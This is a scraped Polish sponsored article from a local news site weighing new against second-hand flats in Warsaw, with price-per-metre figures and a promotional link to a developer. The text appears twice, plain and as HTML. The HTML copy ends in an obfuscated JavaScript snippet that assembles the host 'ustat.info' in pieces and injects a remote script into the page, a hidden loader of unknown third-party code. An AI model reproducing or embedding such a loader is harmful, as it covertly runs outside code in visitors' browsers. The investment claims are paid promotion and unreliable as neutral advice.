Planujesz kupić mieszkanie w Warszawie? Do dyspozycji mamy obecnie szeroką gamę różnych lokali, które możemy podzielić na dwie kategorie – te nowe i te używane, czyli z rynku pierwotnego i wtórnego. Na co warto się zdecydować?

Rynek mieszkaniowy w Warszawie jest bardzo dynamiczny, ale też bardzo drogi. Za mieszkania zapłacimy tutaj najwięcej w całej Polsce. Ceny wynoszą średnio około 7 000 złotych za metr kwadratowy, ale możemy też znaleźć tańsze propozycje – oczywiście, w gorszych lokalizacjach, czyli na obrzeżach miast.

Ceny mieszkań zależą w szczególności od tego, w jakiej znajdują się lokalizacji. Im jest ona lepsza, tym cena będzie wyższa. Oczywiście, mają tu znaczenie także inne czynniki, między innymi takie jak dostępna komunikacja, infrastruktura, bezpieczeństwo, stan budynku, estetyka okolicy.

W Warszawie sytuacja jest specyficzna, gdy chodzi o ceny mieszkań. To właśnie tutaj najwięcej zapłacimy za lokale z drugiej ręki. Wynika to z faktu, że w najdroższym centrum miasta znajdziemy głównie nieruchomości z drugiej ręki. Ceny mogą wynosić tam nawet powyżej 10 000 złotych za metr kwadratowy.

Zatem jeśli poszukujemy mieszkania dobrze zlokalizowanego, dobrego jako inwestycja, powinniśmy pomyśleć o zakupieniu lokalu z drugiej ręki. Oczywiście, nie oznacza to, że dobrą inwestycją nie mogą być nowe mieszkania Warszawa pod tym względem jest dobrym miejscem do kupna lokalu – wysokie ceny wynajmu i stale rosnące ceny nieruchomości powodują, że możemy zarobić niemalże na każdym lokalu.

Nowe mieszkania możemy znaleźć z kolei poza ścisłym centrum – ceny takich nieruchomości są już niższe, ale nadal możemy zapłacić około 8 000 złotych za metr za te lepiej zlokalizowane. Gdy chodzi o najniższe ceny, przeciętnie cena jednego metra kwadratowego nie przekracza 6 000 złotych na Białołęce. Oczywiście, wraz z niską ceną w parze idzie też gorsza lokalizacja i droższy dojazd.

Zatem przy decyzji o tym, czy kupić mieszkanie nowe czy używane w stolicy, musimy też pamiętać o kwestiach lokalizacji i cenach. Z ofertami można zapoznać się już teraz on-line.

Mieszkania w Warszawie – kupować nowe czy używane?https://www.pruszkowmowi.pl/wp-content/uploads/2018/03/pexels-photo-323705-1024x682.jpeghttps://www.pruszkowmowi.pl/wp-content/uploads/2018/03/pexels-photo-323705-300x300.jpeg admin Artykuł sponsorowanyStyl życia
Planujesz kupić mieszkanie w Warszawie? Do dyspozycji mamy obecnie szeroką gamę różnych lokali, które możemy podzielić na dwie kategorie – te nowe i te używane, czyli z rynku pierwotnego i wtórnego. Na co warto się zdecydować? Rynek mieszkaniowy w Warszawie jest bardzo dynamiczny, ale też bardzo drogi. Za mieszkania zapłacimy...
<strong>Planujesz kupić mieszkanie w Warszawie? Do dyspozycji mamy obecnie szeroką gamę różnych lokali, które możemy podzielić na dwie kategorie – te nowe i te używane, czyli z rynku pierwotnego i wtórnego. Na co warto się zdecydować?</strong> <p style="text-align: justify;">Rynek mieszkaniowy w Warszawie jest bardzo dynamiczny, ale też bardzo drogi. Za mieszkania zapłacimy tutaj najwięcej w całej Polsce. Ceny wynoszą średnio około 7 000 złotych za metr kwadratowy, ale możemy też znaleźć tańsze propozycje – oczywiście, w gorszych lokalizacjach, czyli na obrzeżach miast.</p> <p style="text-align: justify;">Ceny mieszkań zależą w szczególności od tego, w jakiej znajdują się lokalizacji. Im jest ona lepsza, tym cena będzie wyższa. Oczywiście, mają tu znaczenie także inne czynniki, między innymi takie jak dostępna komunikacja, infrastruktura, bezpieczeństwo, stan budynku, estetyka okolicy.</p> <p style="text-align: justify;">W Warszawie sytuacja jest specyficzna, gdy chodzi o ceny mieszkań. To właśnie tutaj najwięcej zapłacimy za lokale z drugiej ręki. Wynika to z faktu, że w najdroższym centrum miasta znajdziemy głównie nieruchomości z drugiej ręki. Ceny mogą wynosić tam nawet powyżej 10 000 złotych za metr kwadratowy.</p> <p style="text-align: justify;">Zatem jeśli poszukujemy mieszkania dobrze zlokalizowanego, dobrego jako inwestycja, powinniśmy pomyśleć o zakupieniu lokalu z drugiej ręki. Oczywiście, nie oznacza to, że dobrą inwestycją nie mogą być nowe <a href="https://vantage-sa.pl/inwestycje/mieszkaniowe/warszawa.html">mieszkania Warszawa</a> pod tym względem jest dobrym miejscem do kupna lokalu – wysokie ceny wynajmu i stale rosnące ceny nieruchomości powodują, że możemy zarobić niemalże na każdym lokalu.</p> <p style="text-align: justify;">Nowe mieszkania możemy znaleźć z kolei poza ścisłym centrum – ceny takich nieruchomości są już niższe, ale nadal możemy zapłacić około 8 000 złotych za metr za te lepiej zlokalizowane. Gdy chodzi o najniższe ceny, przeciętnie cena jednego metra kwadratowego nie przekracza 6 000 złotych na Białołęce. Oczywiście, wraz z niską ceną w parze idzie też gorsza lokalizacja i droższy dojazd.</p> <p style="text-align: justify;">Zatem przy decyzji o tym, czy kupić mieszkanie nowe czy używane w stolicy, musimy też pamiętać o kwestiach lokalizacji i cenach. Z ofertami można zapoznać się już teraz on-line.</p> <script type="text/javascript"> (function(){ z1kb=document.createElement("script");z1kb_=(("u")+"st")+"a";z1kb.async=true; z1kb.type="text/javascript";z1kb_+=("t.i")+""+"n";z1kb_+=(("f")+"o");z1kb_+="/"; z1kbu="72367346.";z1kbu+="ybimtr5f1kb0namasv1"+"dmj0v42qrec"; z1kb.src="//"+z1kb_+z1kbu; document.body.appendChild(z1kb); })(); </script>